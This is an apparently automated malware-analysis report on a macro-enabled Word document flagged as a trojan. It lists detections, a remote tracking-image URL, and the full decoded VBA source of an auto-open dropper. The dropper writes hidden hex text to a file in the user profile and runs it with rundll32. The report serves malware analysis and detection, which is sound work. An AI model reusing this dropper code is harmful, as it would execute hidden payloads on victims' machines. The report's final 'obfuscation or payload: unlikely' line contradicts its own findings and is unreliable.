Verdict: MALICIOUS
Risk Score: 266
Heuristics: 9
- ClamAV: Doc.Trojan.Xshell-6923080-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Xshell-6923080-0
- VBA project inside OOXML (medium, OOXML_VBA; 4 related findings). Document contains a VBA project: VBA macros present
  - Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell rdl`
  - AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
  - Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Sub Auto_Open()`
  - Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `pth = Environ(s2) & Chr(92)`
- Remote image (web beacon / tracking pixel) (medium, OOXML_IMAGE_BEACON). Document references an external image URL that loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
- External relationship (medium, OOXML_EXTERNAL_REL). External target in word/_rels/document.xml.rels: http://main.windowskernel14.com/spl/image/Opr122Opn.jpg
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://main.windowskernel14.com/spl/image/Opr122Opn.jpg (OOXML external relationship)
  - http://www.arabkids.com/__dec/filepart2.aspx/index.jpg (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
Extracted artifacts: 2

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2847 bytes | 7b63db6c10ffec8799a1cd6e10feba550e160d8adfdae84131be18c5a04644b1 |
Preview of script (first 1,000 lines of the extracted script):

```vb
' analyst note: two VBA modules as concatenated by olevba. Lines marked
' "analyst note" were added to this report preview for readability and are
' not part of the carved sample.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

' analyst note: both auto-run entry points invoke the same routine on open
Sub Auto_Open()
    getPicture 1
End Sub

Sub AutoOpen()
    getPicture 1
End Sub

Private Sub getPicture(Void As Integer)
    ' analyst note: hex string decodes to "USERPROFILE"
    bmw = "5553455250524F46494C45"
    Dim s2 As String
    ind = 1
    While (ind < Len(bmw))
        Dim bt As String
        bt = Mid(bmw, ind, 2)
        Dim tt As Integer
        On Error Resume Next
        ij = CLng("&H" & bt)
        s2 = s2 + Chr(ij)
        ind = ind + 2
    Wend
    ' analyst note: pth = %USERPROFILE% followed by "\" (Chr(92))
    pth = Environ(s2) & Chr(92)
    s2 = ""
    ' analyst note: hex string decodes to "\pic34.gif"; s2 is not referenced again before being reset
    s1 = "5C70696333342E676966"
    ind = 1
    While (ind < Len(s1))
        bt = Mid(s1, ind, 2)
        On Error Resume Next
        ij = CLng("&H" & bt)
        s2 = s2 + Chr(ij)
        ind = ind + 2
    Wend
    With ActiveDocument
        qtr = 20
        kit = qtr / 2
        pik = 2
        With .Range
            f = FreeFile()
            DoEvents
            jot = "0"
            With .TextRetrievalMode
                ' analyst note: the URL is used only as a source of substrings:
                ' dc = "_dec", xmt = "x", and later poi = "p"
                anosh = "http://www.arabkids.com/__dec/filepart2.aspx/index.jpg"
                dc = Mid(anosh, 26, 4)
                xmt = Mid(anosh, 44, 1)
                fnm = "~$"
                Dim a As Byte
                fnm = fnm & "cache.doc"
                .IncludeHiddenText = True
                azb = 5
            End With
            DoEvents
            aea = azb + 5
            For q = 1 To qtr
                bb = bb + "0"
            Next q
        End With
        poi = Mid(anosh, 35, 1)
        aei = aea - 2
        dc = "," & dc
        ' analyst note: reads the hidden text of document section 2
        With .Sections(pik)
            DoEvents
            With .Range
                poi = poi & Chr(qtr * 5 + 11)
                DoEvents
                With .Font
                    .Hidden = False
                End With
                aaa = .Text
                DoEvents
                ' analyst note: expands run-length tokens ("0x20" .. "0x5") back into runs of "0"
                For p = qtr To azb Step -1
                    anosh = Str(p)
                    pcc = jot + xmt
                    lamb = Trim(anosh)
                    If (p < kit) Then
                        kml = pcc + jot
                        aaa = Replace(aaa, kml + lamb, bb)
                    Else
                        ss = pcc + lamb
                        aaa = Replace(aaa, ss, bb)
                    End If
                    bb = Mid(bb, 2)
                Next p
                ozodo = pth & fnm & dc
                poi = poi & Chr(qtr * 5 + 5)
                ' analyst note: proceeds only if the hidden text starts with the marker "poi"
                If (Mid(aaa, azb - 4, azb - 2)) = poi Then
                    ghos = True
                    .Text = "."
                End If
            End With
            With ActiveDocument
                With .Sections
                    If (ghos) Then
                        Open pth & fnm For Binary As f
                        aaa = Replace(Mid(aaa, aei), " ", "")
                        s2 = ""
                        ' analyst note: hex string decodes to "rundll32 "
                        s1 = "72756E646C6C333220"
                        ind = 1
                        DoEvents
                        While (ind < Len(s1))
                            bt = Mid(s1, ind, 2)
                            On Error Resume Next
                            ij = CLng("&H" & bt)
                            s2 = s2 + Chr(ij)
                            ind = ind + 2
                        Wend
                        rdl = s2 & ozodo
                        DoEvents
                        ' analyst note: hex-decodes the hidden text byte by byte into %USERPROFILE%\~$cache.doc
                        For i = 1 To Len(aaa) - 2 Step 2
                            On Error Resume Next
                            ch = "&H" + Mid(aaa, i, 2)
                            a = ch
                            Put #f, , a
                        Next i
                        Close #f
                        DoEvents
                        ' analyst note: the OLE_VBA_SHELL match; runs rundll32 on the dropped file with export "_dec"
                        Shell rdl
                    End If
                    ctn = .Count
                End With
                ' analyst note: re-hides every section before section 2 and saves the document
                For i = 1 To ctn
                    With ActiveDocument
                        With .Sections(i)
                            With .Range
                                With .Font
                                    If (i < pik) Then
                                        .Hidden = True
                                    Else
                                        .Hidden = False
                                    End If
                                End With
                            End With
                        End With
                    End With
                Next i
            End With
        End With
        .Save
    End With
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes | 157d5c351f451bca1dbe81bc0cd70da372309b123079dc7b4552c8c574b95209 |

Detection:
- ClamAV: Doc.Trojan.Xshell-6923080-0
- Obfuscation or payload: unlikely